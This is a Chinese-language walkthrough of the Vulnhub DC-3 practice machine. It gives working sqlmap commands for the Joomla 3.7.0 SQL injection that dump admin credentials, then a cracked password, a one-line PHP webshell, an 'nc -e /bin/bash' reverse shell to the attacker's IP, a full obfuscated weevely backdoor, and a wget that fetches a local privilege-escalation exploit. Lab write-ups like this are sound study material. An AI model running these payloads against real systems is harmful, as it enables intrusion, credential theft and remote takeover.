Vulnhub靶场DC-3

本机192.168.223.128
靶机192.168.223.139
目标发现nmap -sP 192.168.223.0/24

在这里插入图片描述

端口扫描nmap -p- 192.168.223.139
在这里插入图片描述

之开启了一个80端口
看一下是什么服务

nmap -sV -p- -A 192.168.223.139

在这里插入图片描述

是一个apache服务,joomla模板
看一下web
在这里插入图片描述

没什么有用信息。
扫描一下后台

dirsearch -u http://192.168.223.139/

在这里插入图片描述

有个administator可能是后台界面
看一下
在这里插入图片描述

joomla这个cms有个专门漏扫工具
joomscan --help


扫一下
在这里插入图片描述

没扫出来什么有用的信息
比较重要的就是这个版本3.7.0,搜一下看看有没有漏洞
在这里插入图片描述

看一下这个php文件
把里面的url改成目标机ip
在这里插入图片描述

不太管用,换个txt文件看看怎么个回事
在这里插入图片描述

看看这42033.txt,版本号完全一致
在这里插入图片描述

给了sqlmap的指令,把其中的url改一下

sqlmap -u "http://192.168.223.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --current-db -p list[fullordering]

在这里插入图片描述

爆出库名了
看一下当前库名
在这里插入图片描述

当前是joomladb
看一下表明

sqlmap -u "http://192.168.223.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --tables -D joomladb -p list[fullordering]

在这里插入图片描述

巨长的表,一般看users

sqlmap -u "http://192.168.223.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent  -T "#__users" -D joomladb -p list[fullordering] --columns

注意给表名加上双引号不然会被当成注释
在这里插入图片描述

这里字典就使用1
在这里插入图片描述

有账号密码

sqlmap -u "http://192.168.223.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dump -C username,password -T "#__users" -D joomladb -p list[fullordering]

在这里插入图片描述

admin $2y 10 10 10DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
john爆破一下密码
在这里插入图片描述

密码是snoopy
在这里插入图片描述

登上了
在这里插入图片描述

这里可以文件读取也可以文件上传
发现有个php文件,修改成一句话
在这里插入图片描述

注意目录是/templates/beez3/html/modules.php
成功rce
现在可以反弹shell
攻击机开个监听端口 nc -lvnp 4567
x=system(“nc -e /bin/bash 192.168.223.128 4567”);
发现弹不过来,不知道什么问题。。。(后来发现是靶机的nc 没有-e功能)
在这里插入图片描述

换个方法,用kali自带的传马工具weevely
先生成在一个马
weevely generate x /tmp/shell.php
把里面的内容复制到刚才那个modules.php里面

<?php
$K='$k="9dd4XAe461";$XAXAkhXA="268c8XA034f5c8XA";$kf="564e15XAXA5c67a6";$XAp="6obiXAXAcjYP3y0JgHXApI";funct';
$X=str_replace('B','','BcBrBeateB_fBBunction');
$c='XAioXAn x($t,$k){XA$c=stXArlXAen(XAXA$k);$l=strlen($tXA);$o="";fXAXAor($XAi=0;$i<$l;){for(XA$j=0;(';
$H='"XA/$khXA(.+)$XAkfXA/",XA@file_get_contentXAsXA("php://input"XAXA),$m)==1)XA {@ob_sXAtart()XA;@evX';
$n='Aal(@gzXAuncompreXAss(@XAx(@base6XA4_decode(XA$mXA[1XA]XA),$k)));$o=@ob_geXAt_conXAtentXAs();@ob_e';
$W='XAnXAd_clean();XA$r=@baseXA6XAXA4_encode(@x(@gzcomXApressXA($o),XAXAXA$k));priXAnt("$p$kh$r$kf");}';
$C='XAXA$j<$cXA&&$i<XA$lXA);$j++,$i++){$XAo.=$tXA{$i}^$XAk{XA$j};}}retuXAXArn $o;}iXAf (@preg_matchXA(';
$r=str_replace('XA','',$K.$c.$C.$H.$n.$W);
$i=$X('',$r);$i();
?>

然后连接 weevely http://192.168.223.139/templates/beez3/html/modules.php x

在这里插入图片描述

成功弹回shell

翻了一圈没找到可以利用的文件,看了别人的wp发现是Ubuntu这个版本有漏洞
lsb_release -a看一下自己的Ubuntu版本
在这里插入图片描述

搜一下版本漏洞
在这里插入图片描述

看其他人使用这个漏洞,看一下
在这里插入图片描述

下载一下exp

wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip

在这里插入图片描述

最后老失败,不知道为什么,晕,基本完成了…